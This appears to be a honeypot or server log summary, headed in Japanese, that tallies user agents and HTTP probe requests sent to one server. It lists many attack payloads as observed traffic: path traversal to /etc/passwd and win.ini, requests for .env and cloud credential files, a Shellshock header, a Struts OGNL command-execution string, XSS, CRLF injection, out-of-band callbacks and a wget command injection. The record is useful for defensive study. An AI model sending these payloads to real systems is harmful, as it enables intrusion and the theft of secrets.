133 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 |
106 | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36 |
119 | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36 |
8 | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE |
119 | Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36 |
105 | Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36 |
113 | Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36 |
113 | Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 |
101 | Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36 |
116 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F |
132 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36 |
51 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
115 | Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36 |
108 | Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36 |
115 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36 |
1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:66.0) Gecko/20100101 Firefox/66.0 |
6 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
2 | Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/) |
1 | Mozilla/5.0 (compatible; Googlebot/2.1; +http[:]//www[.]google[.]com/bot.html) |
1 | Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 |
1 | Mozilla/5.0 zgrab/0.x |
1 | Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 |
2 | Nacos-Server |
1 | Report Runner |
1 | \"() { :; }; echo ; /bin/bash -c 'cat /etc/passwd'\" |
2 | asusrouter-- |
1 | curl/7.79.1 |
3 | python-requests/2.22.0 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | \x16\x03\x01\x01H\x01 |
||
22 | \x16\x03\x01 |
||
1 | user=admin&psw=MTIzNA%3D%3D |
||
1 | CONNECT | www[.]google[.]com:443 |
HTTP/1.1 |
1 | DEBUG | /Foobar-debug.aspx |
HTTP/1.1 |
1 | GET | ../../proc/ HTTP |
|
2 | GET | /%2500/interact.sh/ |
HTTP/1.1 |
2 | GET | /%2509/interact.sh/ |
HTTP/1.1 |
2 | GET | /%250A/interact.sh/ |
HTTP/1.1 |
1 | GET | /%250ASet-Cookie:crlfinjection=crlfinjection |
HTTP/1.1 |
2 | GET | /%250a/interact.sh/ |
HTTP/1.1 |
2 | GET | /%250d/interact.sh/ |
HTTP/1.1 |
1 | GET | /%2520../web-inf/web.xml |
HTTP/1.1 |
1 | GET | /%2524%257B%2528%2523_memberAccess%255B%2522allowStaticMethodAccess%2522%255D%253Dtrue%252C%2523a%253D@java.lang.Runtime@getRuntime%2528%2529.exec%2528%2527cat%2520/etc/passwd%2527%2529.getInputStream%2528%2529%252C%2523b%253Dnew%2520java.io.InputStreamReader%2528%2523a%2529%252C%2523c%253Dnew%2520%2520java.io.BufferedReader%2528%2523b%2529%252C%2523d%253Dnew%2520char%255B51020%255D%252C%2523c.read%2528%2523d%2529%252C%2523sbtest%253D@org.apache.struts2.ServletActionContext@getResponse%2528%2529.getWriter%2528%2529%252C%2523sbtest.println%2528%2523d%2529%252C%2523sbtest.close%2528%2529%2529%257D/actionChain1.action |
HTTP/1.1 |
1 | GET | /%252F.. |
HTTP/1.1 |
1 | GET | /%252e%252e%252e%252e%252e%252e%252e%252e%252e%252e%252e%252e%252e%252e%252e%252ewindows/win.ini |
HTTP/1.1 |
1 | GET | /%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd |
HTTP/1.1 |
1 | GET | /%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e/etc/passwd |
HTTP/1.1 |
1 | GET | /%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows/win.ini |
HTTP/1.1 |
1 | GET | /%252f/ |
HTTP/1.1 |
1 | GET | /%253Cscript%253Ealert%28document.domain%29%253C/script%253E |
HTTP/1.1 |
2 | GET | /%255C%255Cinteract.sh/%25252e%25252e%25252f |
HTTP/1.1 |
1 | GET | /%255C../%255C../%255C../%255C../%255C../%255C../%255C../%255C../%255C../%255C../%255C../windows/win.ini |
HTTP/1.1 |
2 | GET | /%255Cinteract.sh |
HTTP/1.1 |
2 | GET | /%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini |
HTTP/1.1 |
2 | GET | /%255chttp[:]//13[.]67[.]44[.]234interact.sh/%252f%252e%252e |
HTTP/1.1 |
2 | GET | /%255cinteract.sh/%252f%252e%252e |
HTTP/1.1 |
1 | GET | /%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/windows/win.ini |
HTTP/1.1 |
1 | GET | /%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/etc/passwd%2500 |
HTTP/1.1 |
1 | GET | /%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/etc/passwd |
HTTP/1.1 |
1 | GET | /%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/windows/win.ini%2500 |
HTTP/1.1 |
1 | GET | /%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/windows/win.ini |
HTTP/1.1 |
1 | GET | /%25c0%25ae/%25c0%25ae/%25c0%25ae/%25c0%25ae/WEB-INF/web.xml |
HTTP/1.1 |
2 | GET | /%25c0%25ae/%25c0%25ae/%25c0%25ae/WEB-INF/web.xml |
HTTP/1.1 |
1 | GET | /%25c0%25ae/%25c0%25ae/WEB-INF/web.xml |
HTTP/1.1 |
2 | GET | /%25c0%25ae/WEB-INF/web.xml |
HTTP/1.1 |
2 | GET | /%25c0 |
HTTP/1.1 |
1 | GET | /%7BBaseURL%7D%7D/redmine/config/initializers/secret_token.rb |
HTTP/1.1 |
1 | GET | /%u002e/WEB-INF/web.xml |
HTTP/1.1 |
1 | GET | /&?=? |
HTTP/1.1 |
1 | GET | /' |
HTTP/1.1 |
1 | GET | /(download)/etc/passwd |
HTTP/1.1 |
1 | GET | /+CSCOE+/logon.html |
HTTP/1.1 |
1 | GET | /+CSCOE+/session_password.html |
HTTP/1.1 |
1 | GET | /+CSCOT+/oem-customization?app=AnyConnect&name=%2bCSCOE%2b/portal_inc.lua&platform=..&resource-type=..&type=oem |
HTTP/1.1 |
1 | GET | /+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions |
HTTP/1.1 |
1 | GET | /-/snippets |
HTTP/1.1 |
1 | GET | /.%00/WEB-INF/web.xml |
HTTP/1.1 |
1 | GET | /.%25252e/.%25252e/.%25252e/.%25252e/.%25252e/.%25252e/.%25252e/etc/passwd |
HTTP/1.1 |
1 | GET | /.%25252e/.%25252e/.%25252e/.%25252e/.%25252e/.%25252e/.%25252e/windows/win.ini |
HTTP/1.1 |
1 | GET | /.%255C%255C./.%255C%255C./.%255C%255C./.%255C%255C./.%255C%255C./.%255C%255C./windows/win.ini |
HTTP/1.1 |
1 | GET | /..%25252F..%25252F..%25252F..%25252F..%25252F..%25252F..%25252F..%25252F..%25252F..%25252F..%25252Fetc%25252Fpasswd%2523foo/development |
HTTP/1.1 |
2 | GET | /..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fwindows%252Fwin.ini |
HTTP/1.1 |
1 | GET | /..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd |
HTTP/1.1 |
2 | GET | /..%253B/monitoring |
HTTP/1.1 |
1 | GET | /..%255c..%255c..%255c..%255c..%255c..%255c..%255cetc/passwd |
HTTP/1.1 |
1 | GET | /..%255c..%255c..%255c..%255c..%255c..%255cetc/passwd |
HTTP/1.1 |
1 | GET | /..%255c..%255c..%255c..%255c..%255cetc/passwd |
HTTP/1.1 |
1 | GET | /..%255c..%255c..%255c..%255cetc/passwd |
HTTP/1.1 |
1 | GET | /..%255c..%255c..%255cetc/passwd |
HTTP/1.1 |
1 | GET | /..%255cetc/passwd |
HTTP/1.1 |
1 | GET | /...%5C...%5C...%5C...%5C...%5C...%5C...%5C...%5C...%5Cwindows%5Cwin.ini |
HTTP/1.1 |
1 | GET | /....%5C....%5C....%5C....%5C....%5C....%5C....%5C....%5C....%5Cwindows%5Cwin.ini |
HTTP/1.1 |
1 | GET | /..../..../..../..../..../..../..../..../..../windows/win.ini |
HTTP/1.1 |
2 | GET | /....4.2.1....json |
HTTP/1.1 |
2 | GET | /.../.../.../.../.../.../.../.../.../etc/passwd |
HTTP/1.1 |
4 | GET | /.../.../.../.../.../.../.../.../.../windows/win.ini |
HTTP/1.1 |
1 | GET | /../../../../../../../../../../../../../etc/passwd |
HTTP/1.1 |
1 | GET | /../../../../../../../../../../../../windows/win.ini |
HTTP/1.1 |
2 | GET | /../../../../../../etc/passwd |
HTTP/1.1 |
1 | GET | /../../../../../etc/passwd |
HTTP/1.1 |
1 | GET | /../../../..//etc/passwd |
HTTP/1.1 |
2 | GET | /../../../../WEB-INF/web.xml |
HTTP/1.1 |
2 | GET | /../../../WEB-INF/web.xml;x= |
HTTP/1.1 |
1 | GET | /../../../WEB-INF/web.xml |
HTTP/1.1 |
1 | GET | /../../WEB-INF/web.xml;x= |
HTTP/1.1 |
2 | GET | /../../WEB-INF/web.xml |
HTTP/1.1 |
1 | GET | /../../web.config |
HTTP/1.1 |
1 | GET | /..///////..////..//////windows/win.ini |
HTTP/1.1 |
1 | GET | /../WEB-INF/web.xml;x= |
HTTP/1.1 |
2 | GET | /../WEB-INF/web.xml |
HTTP/1.1 |
1 | GET | /../conf/config.properties |
HTTP/1.1 |
2 | GET | /../interact.sh |
HTTP/1.1 |
1 | GET | /..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd |
HTTP/1.1 |
1 | GET | /..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini |
HTTP/1.1 |
1 | GET | /..;/examples/jsp/index.html |
HTTP/1.1 |
1 | GET | /..;/manager/html |
HTTP/1.1 |
1 | GET | /..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini |
HTTP/1.1 |
2 | GET | /./../../../../../../../../../../etc/passwd |
HTTP/1.1 |
1 | GET | /./../../../../../../../../../../windows/win.ini |
HTTP/1.1 |
1 | GET | /.//WEB-INF/classes/META-INF/microprofile-config.properties |
HTTP/1.1 |
1 | GET | /.//WEB-INF/web.xml |
HTTP/1.1 |
1 | GET | /.1.json |
HTTP/1.1 |
2 | GET | /.Dockerfile |
HTTP/1.1 |
1 | GET | /.angular-cli.json |
HTTP/1.1 |
1 | GET | /.appveyor.yml |
HTTP/1.1 |
3 | GET | /.aws/credentials |
HTTP/1.1 |
2 | GET | /.axiom/accounts/do.json |
HTTP/1.1 |
1 | GET | /.azure-pipelines.yml |
HTTP/1.1 |
1 | GET | /.bash_history |
HTTP/1.1 |
1 | GET | /.chef/config.rb |
HTTP/1.1 |
2 | GET | /.children....4.2.1....json |
HTTP/1.1 |
1 | GET | /.children.json/FNZ.css |
HTTP/1.1 |
1 | GET | /.children.json/FNZ.png |
HTTP/1.1 |
2 | GET | /.circleci/config.yml |
HTTP/1.1 |
1 | GET | /.circleci/ssh-config |
HTTP/1.1 |
1 | GET | /.composer-auth.json |
HTTP/1.1 |
1 | GET | /.composer/composer.json |
HTTP/1.1 |
3 | GET | /.config/gatsby/config.json |
HTTP/1.1 |
1 | GET | /.config/gcloud/credentials.db |
HTTP/1.1 |
1 | GET | /.config/sftp.json |
HTTP/1.1 |
3 | GET | /.cordova/config.json |
HTTP/1.1 |
1 | GET | /.dbeaver/data-sources.json |
HTTP/1.1 |
3 | GET | /.deployment-config.json |
HTTP/1.1 |
3 | GET | /.docker/.env |
HTTP/1.1 |
3 | GET | /.docker/config.json |
HTTP/1.1 |
3 | GET | /.docker/daemon.json |
HTTP/1.1 |
3 | GET | /.docker/laravel/app/.env |
HTTP/1.1 |
2 | GET | /.dockerfile |
HTTP/1.1 |
2 | GET | /.drone.yml |
HTTP/1.1 |
1 | GET | /.editorconfig |
HTTP/1.1 |
1 | GET | /.env.13.67 |
HTTP/1.1 |
4 | GET | /.env.backup |
HTTP/1.1 |
3 | GET | /.env.bak |
HTTP/1.1 |
2 | GET | /.env.dev.local |
HTTP/1.1 |
3 | GET | /.env.dev |
HTTP/1.1 |
3 | GET | /.env.development.local |
HTTP/1.1 |
3 | GET | /.env.dist |
HTTP/1.1 |
3 | GET | /.env.docker.dev |
HTTP/1.1 |
2 | GET | /.env.example |
HTTP/1.1 |
1 | GET | /.env.live |
HTTP/1.1 |
7 | GET | /.env.local |
HTTP/1.1 |
1 | GET | /.env.old |
HTTP/1.1 |
3 | GET | /.env.php |
HTTP/1.1 |
2 | GET | /.env.prod.local |
HTTP/1.1 |
4 | GET | /.env.prod |
HTTP/1.1 |
3 | GET | /.env.production.local |
HTTP/1.1 |
4 | GET | /.env.production |
HTTP/1.1 |
3 | GET | /.env.sample.php |
HTTP/1.1 |
4 | GET | /.env.save |
HTTP/1.1 |
4 | GET | /.env.stage |
HTTP/1.1 |
3 | GET | /.env.staging |
HTTP/1.1 |
3 | GET | /.env.test.local |
HTTP/1.1 |
3 | GET | /.env.test |
HTTP/1.1 |
1 | GET | /.env.www |
HTTP/1.1 |
1 | GET | /.env_1 |
HTTP/1.1 |
1 | GET | /.env_sample |
HTTP/1.1 |
58 | GET | /.env |
HTTP/1.1 |
3 | GET | /.environment |
HTTP/1.1 |
3 | GET | /.envrc |
HTTP/1.1 |
3 | GET | /.envs |
HTTP/1.1 |
3 | GET | /.env~ |
HTTP/1.1 |
1 | GET | /.esmtprc |
HTTP/1.1 |
1 | GET | /.git-credentials |
HTTP/1.1 |
1 | GET | /.git/ |
HTTP/1.1 |
1 | GET | /.git/config |
HTTP/1.1 |
1 | GET | /.git/logs/HEAD |
HTTP/1.1 |
1 | GET | /.gitignore |
HTTP/1.1 |
3 | GET | /.gitlab-ci/.env |
HTTP/1.1 |
1 | GET | /.hg/hgrc |
HTTP/1.1 |
1 | GET | /.htaccess |
HTTP/1.1 |
2 | GET | /.idea/deployment.xml |
HTTP/1.1 |
2 | GET | /.interact.sh |
HTTP/1.1 |
1 | GET | /.json/FNZ.css |
HTTP/1.1 |
2 | GET | /.json/FNZ.png |
HTTP/1.1 |
2 | GET | /.json?FNZ.css |
HTTP/1.1 |
2 | GET | /.json?FNZ.html |
HTTP/1.1 |
1 | GET | /.json |
HTTP/1.1 |
3 | GET | /.jupyter/jupyter_notebook_config.json |
HTTP/1.1 |
3 | GET | /.lanproxy/config.json |
HTTP/1.1 |
4 | GET | /.msmtprc |
HTTP/1.1 |
2 | GET | /.netrc |
HTTP/1.1 |
1 | GET | /.npmrc |
HTTP/1.1 |
1 | GET | /.nuget/packages.config |
HTTP/1.1 |
1 | GET | /.phpunit.result.cache |
HTTP/1.1 |
1 | GET | /.remote-sync.json |
HTTP/1.1 |
1 | GET | /.rubocop.yml |
HTTP/1.1 |
4 | GET | /.s3cfg |
HTTP/1.1 |
1 | GET | /.sass-lint.yml |
HTTP/1.1 |
1 | GET | /.scrutinizer.yml |
HTTP/1.1 |
1 | GET | /.sh_history |
HTTP/1.1 |
2 | GET | /.snyk |
HTTP/1.1 |
1 | GET | /.svn/entries |
HTTP/1.1 |
1 | GET | /.travis.yml |
HTTP/1.1 |
1 | GET | /.user.ini |
HTTP/1.1 |
3 | GET | /.vscode/.env |
HTTP/1.1 |
1 | GET | /.well-known/acme-challenge/%253C%253fxml%2520version=%25221.0%2522%253f%253E%253Cx:script%2520xmlns:x=%2522http[:]//www[.]w3[.]org/1999/xhtml%2522%253Ealert%2528document.domain%2526%2523x29%253B%253C/x:script%253E |
HTTP/1.1 |
1 | GET | /.well-known/matrix/client |
HTTP/1.1 |
1 | GET | /.well-known/matrix/server |
HTTP/1.1 |
3 | GET | /.well-known/openid-configuration |
HTTP/1.1 |
1 | GET | /.wgetrc |
HTTP/1.1 |
3 | GET | /.wp-config.php.swo |
HTTP/1.1 |
2 | GET | /.wp-config.php.swp |
HTTP/1.1 |
3 | GET | /.wp-config.swp |
HTTP/1.1 |
1 | GET | /.zsh_history |
HTTP/1.1 |
2 | GET | ///../app.js |
HTTP/1.1 |
1 | GET | ///////../../../etc/passwd |
HTTP/1.1 |
2 | GET | ///apps |
HTTP/1.1 |
1 | GET | ///bin///wcm///search///gql[.]json///a[.]1[.]json?pathPrefix&query=type:base%20limit:..1 |
HTTP/1.1 |
1 | GET | ///bin///wcm///search///gql[.]json///a[.]4[.]2[.]1...json?pathPrefix&query=type:base%20limit:..1 |
HTTP/1.1 |
1 | GET | ///bin///wcm///search///gql[.]json///a[.]css?pathPrefix&query=type:base%20limit:..1 |
HTTP/1.1 |
1 | GET | ///bin///wcm///search///gql[.]json///a[.]html?pathPrefix&query=type:base%20limit:..1 |
HTTP/1.1 |
1 | GET | ///bin///wcm///search///gql[.]json///a[.]ico?pathPrefix&query=type:base%20limit:..1 |
HTTP/1.1 |
1 | GET | ///bin///wcm///search///gql[.]json///a[.]js?pathPrefix&query=type:base%20limit:..1 |
HTTP/1.1 |
1 | GET | ///bin///wcm///search///gql[.]json;%250aa.css?pathPrefix&query=type:base%20limit:..1 |
HTTP/1.1 |
1 | GET | ///bin///wcm///search///gql[.]json;%250aa.html?pathPrefix&query=type:base%20limit:..1 |
HTTP/1.1 |
1 | GET | ///bin///wcm///search///gql[.]json;%250aa.ico?pathPrefix&query=type:base%20limit:..1 |
HTTP/1.1 |
1 | GET | ///bin///wcm///search///gql[.]json;%250aa.js?pathPrefix&query=type:base%20limit:..1 |
HTTP/1.1 |
1 | GET | ///bin///wcm///search///gql[.]json?pathPrefix&query=type:base%20limit:..1 |
HTTP/1.1 |
1 | GET | ///bin///wcm///search///gql[.]servlet[.]json?pathPrefix&query=type:base%20limit:..1 |
HTTP/1.1 |
1 | GET | ///etc....4.2.1....json |
HTTP/1.1 |
1 | GET | ///etc[.]1[.]json |
HTTP/1.1 |
2 | GET | ///etc[.]children....4.2.1....json |
HTTP/1.1 |
1 | GET | ///etc[.]children[.]1[.]json |
HTTP/1.1 |
1 | GET | ///etc[.]children[.]json/FNZ.css |
HTTP/1.1 |
2 | GET | ///etc[.]children[.]json/FNZ.html |
HTTP/1.1 |
1 | GET | ///etc[.]children[.]json/FNZ.ico |
HTTP/1.1 |
1 | GET | ///etc[.]children[.]json/FNZ.png |
HTTP/1.1 |
1 | GET | ///etc[.]children[.]json?FNZ.css |
HTTP/1.1 |
2 | GET | ///etc[.]children[.]json?FNZ.html |
HTTP/1.1 |
1 | GET | ///etc[.]children[.]json?FNZ.ico |
HTTP/1.1 |
2 | GET | ///etc[.]children[.]json |
HTTP/1.1 |
2 | GET | ///etc[.]json/FNZ.html |
HTTP/1.1 |
2 | GET | ///etc[.]json/FNZ.ico |
HTTP/1.1 |
1 | GET | ///etc[.]json/FNZ.png |
HTTP/1.1 |
1 | GET | ///etc[.]json?FNZ.css |
HTTP/1.1 |
1 | GET | ///etc[.]json?FNZ.ico |
HTTP/1.1 |
2 | GET | ///etc[.]json |
HTTP/1.1 |
1 | GET | ///etc |
HTTP/1.1 |
2 | GET | ///home |
HTTP/1.1 |
2 | GET | ///system///console///bundles |
HTTP/1.1 |
1 | GET | ///system///sling///loginstatus |
HTTP/1.1 |
1 | GET | ///var |
HTTP/1.1 |
2 | GET | //WEB-INF/web.xml |
HTTP/1.1 |
2 | GET | //WEB-INF/weblogic.xml |
HTTP/1.1 |
3 | GET | //api/info.php |
HTTP/1.1 |
3 | GET | //api/phpinfo.php |
HTTP/1.1 |
3 | GET | //backend/info.php |
HTTP/1.1 |
3 | GET | //backend/phpinfo.php |
HTTP/1.1 |
3 | GET | //backup/info.php |
HTTP/1.1 |
3 | GET | //backup/phpinfo.php |
HTTP/1.1 |
3 | GET | //crm/info.php |
HTTP/1.1 |
3 | GET | //crm/phpinfo.php |
HTTP/1.1 |
1 | GET | //css//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows\\win.ini |
HTTP/1.1 |
3 | GET | //current/info.php |
HTTP/1.1 |
3 | GET | //current/phpinfo.php |
HTTP/1.1 |
3 | GET | //dev/info.php |
HTTP/1.1 |
3 | GET | //dev/phpinfo.php |
HTTP/1.1 |
3 | GET | //develop/info.php |
HTTP/1.1 |
3 | GET | //develop/phpinfo.php |
HTTP/1.1 |
3 | GET | //development/iinfo.php |
HTTP/1.1 |
3 | GET | //development/phpinfo.php |
HTTP/1.1 |
3 | GET | //help/info.php |
HTTP/1.1 |
3 | GET | //help/phpinfo.php |
HTTP/1.1 |
3 | GET | //helper/info.php |
HTTP/1.1 |
3 | GET | //helper/phpinfo.php |
HTTP/1.1 |
3 | GET | //info[.]php |
HTTP/1.1 |
1 | GET | //interactsh[.]com%252f.. |
HTTP/1.1 |
3 | GET | //lara/info.php |
HTTP/1.1 |
3 | GET | //lara/phpinfo.php |
HTTP/1.1 |
3 | GET | //laravel/info.php |
HTTP/1.1 |
3 | GET | //laravel/phpinfo.php |
HTTP/1.1 |
3 | GET | //phpinfo |
HTTP/1.1 |
3 | GET | //server/info.php |
HTTP/1.1 |
3 | GET | //server/phpinfo.php |
HTTP/1.1 |
3 | GET | //service/info.php |
HTTP/1.1 |
3 | GET | //service/phpinfo.php |
HTTP/1.1 |
3 | GET | //services/info.php |
HTTP/1.1 |
3 | GET | //services/phpinfo.php |
HTTP/1.1 |
3 | GET | //xampp/info.php |
HTTP/1.1 |
3 | GET | //xampp/phpinfo.php |
HTTP/1.1 |
2 | GET | /1.sql |
HTTP/1.1 |
2 | GET | /13.67.44.234.bz2 |
HTTP/1.1 |
2 | GET | /13.67.44.234.db |
HTTP/1.1 |
2 | GET | /13.67.44.234.gz |
HTTP/1.1 |
2 | GET | /13.67.44.234.lz |
HTTP/1.1 |
2 | GET | /13.67.44.234.rar |
HTTP/1.1 |
1 | GET | /13.67.44.234.sql.7z |
HTTP/1.1 |
2 | GET | /13.67.44.234.sql.bz2 |
HTTP/1.1 |
1 | GET | /13.67.44.234.sql.gz |
HTTP/1.1 |
2 | GET | /13.67.44.234.sql.lz |
HTTP/1.1 |
2 | GET | /13.67.44.234.sql.rar |
HTTP/1.1 |
1 | GET | /13.67.44.234.sql.tar.z |
HTTP/1.1 |
2 | GET | /13.67.44.234.sql.xz |
HTTP/1.1 |
2 | GET | /13.67.44.234.sql.z |
HTTP/1.1 |
2 | GET | /13.67.44.234.sql.zip |
HTTP/1.1 |
1 | GET | /13.67.44.234.sql |
HTTP/1.1 |
1 | GET | /13.67.44.234.sqlite |
HTTP/1.1 |
2 | GET | /13.67.44.234.sqlitedb |
HTTP/1.1 |
1 | GET | /13.67.44.234.tar.gz |
HTTP/1.1 |
2 | GET | /13.67.44.234.tar.z |
HTTP/1.1 |
2 | GET | /13.67.44.234.xz |
HTTP/1.1 |
1 | GET | /13.67.44.234.z |
HTTP/1.1 |
1 | GET | /13.67.44.234.zip |
HTTP/1.1 |
1 | GET | /13.67.44.234/error.log |
HTTP/1.1 |
1 | GET | /13.67.44.234/errors.log |
HTTP/1.1 |
2 | GET | /13.67.44.234_db.sql |
HTTP/1.1 |
2 | GET | /13.67.7z |
HTTP/1.1 |
2 | GET | /13.67.bz2 |
HTTP/1.1 |
1 | GET | /13.67.db |
HTTP/1.1 |
1 | GET | /13.67.gz |
HTTP/1.1 |
1 | GET | /13.67.lz |
HTTP/1.1 |
1 | GET | /13.67.rar |
HTTP/1.1 |
2 | GET | /13.67.sql.7z |
HTTP/1.1 |
1 | GET | /13.67.sql.bz2 |
HTTP/1.1 |
2 | GET | /13.67.sql.gz |
HTTP/1.1 |
2 | GET | /13.67.sql.lz |
HTTP/1.1 |
1 | GET | /13.67.sql.rar |
HTTP/1.1 |
2 | GET | /13.67.sql.tar.gz |
HTTP/1.1 |
1 | GET | /13.67.sql.tar.z |
HTTP/1.1 |
2 | GET | /13.67.sql.xz |
HTTP/1.1 |
2 | GET | /13.67.sql.z |
HTTP/1.1 |
1 | GET | /13.67.sql.zip |
HTTP/1.1 |
1 | GET | /13.67.sqlite |
HTTP/1.1 |
2 | GET | /13.67.sqlitedb |
HTTP/1.1 |
2 | GET | /13.67.tar.gz |
HTTP/1.1 |
2 | GET | /13.67.tar.z |
HTTP/1.1 |
1 | GET | /13.67.xz |
HTTP/1.1 |
2 | GET | /13.67.z |
HTTP/1.1 |
2 | GET | /13.67.zip |
HTTP/1.1 |
1 | GET | /2LM9bIiti31LvxuXNbsnapSWjQp.txt |
HTTP/1.1 |
1 | GET | /2LM9bPj945KstBneISJvL9yua9E |
HTTP/1.1 |
1 | GET | /2LM9bQRbEa1PJGwCSK0WGp9wIMq.php?cmd=sudo%20rpm%20--eval%20'%25%7Blua:os.execute(%22wget%20http[:]//%22)%7D' |
HTTP/1.1 |
1 | GET | /2LM9bjE8vQteBVxpFjWTgZBTSe1.jsp |
HTTP/1.1 |
1 | GET | /2LM9cLawzWUmBRi2VwlPzfCvnao |
HTTP/1.1 |
1 | GET | /2LM9cekPxFgZuPRbRrZ0KPhtnZp.json |
HTTP/1.1 |
1 | GET | /2LM9cj0oDVgckvm8rMMOE4Eua9j |
HTTP/1.1 |
2 | GET | /2LM9clR77bCmSTbxy1WNvms54V6.txt |
HTTP/1.1 |
1 | GET | /2LM9dFrLjWid4zIMjU2N0tZOU5o.txt |
HTTP/1.1 |
1 | GET | /2LNn5SDE5wp9xH1oiG468hKzg2h.php%5Cx0A |
HTTP/1.1 |
1 | GET | /2LNn5u2idzdp9u7kVWgabBFha5B |
HTTP/1.1 |
2 | GET | /2LNn5zd8MCzpc6tvFRTisvivqRk.txt |
HTTP/1.1 |
1 | GET | /2LNn69ogJ0F6ZUHlXgXqIDQvk6D.php |
HTTP/1.1 |
1 | GET | /2LNn6B9tESQeLAYAXpO3Hau4GYe.php?cmd=sudo%20rpm%20--eval%20'%25%7Blua:os.execute(%22wget%20http[:]//%22)%7D' |
HTTP/1.1 |
1 | GET | /2LNn6DnIxzePq8F993xHhF0HuGH |
HTTP/1.1 |
1 | GET | /2LNn6HEVD6Ti5fDpRuaEGdw75qI |
HTTP/1.1 |
1 | GET | /2LNn6IchArG4jGd7FyW6A1m5iaS/..;/host-manager/html |
HTTP/1.1 |
1 | GET | /2LNn6IchArG4jGd7FyW6A1m5iaS/..;/manager/html |
HTTP/1.1 |
1 | GET | /2LNn6ZydeFznZ6PXkofhcWWrjWq.jsp |
HTTP/1.1 |
1 | GET | /404.php.bak |
HTTP/1.1 |
1 | GET | /404 |
HTTP/1.1 |
1 | GET | /44.234.7z |
HTTP/1.1 |
2 | GET | /44.234.bz2 |
HTTP/1.1 |
2 | GET | /44.234.db |
HTTP/1.1 |
2 | GET | /44.234.gz |
HTTP/1.1 |
1 | GET | /44.234.lz |
HTTP/1.1 |
1 | GET | /44.234.rar |
HTTP/1.1 |
1 | GET | /44.234.sql.7z |
HTTP/1.1 |
2 | GET | /44.234.sql.bz2 |
HTTP/1.1 |
1 | GET | /44.234.sql.gz |
HTTP/1.1 |
2 | GET | /44.234.sql.lz |
HTTP/1.1 |
1 | GET | /44.234.sql.rar |
HTTP/1.1 |
2 | GET | /44.234.sql.tar.gz |
HTTP/1.1 |
1 | GET | /44.234.sql.tar.z |
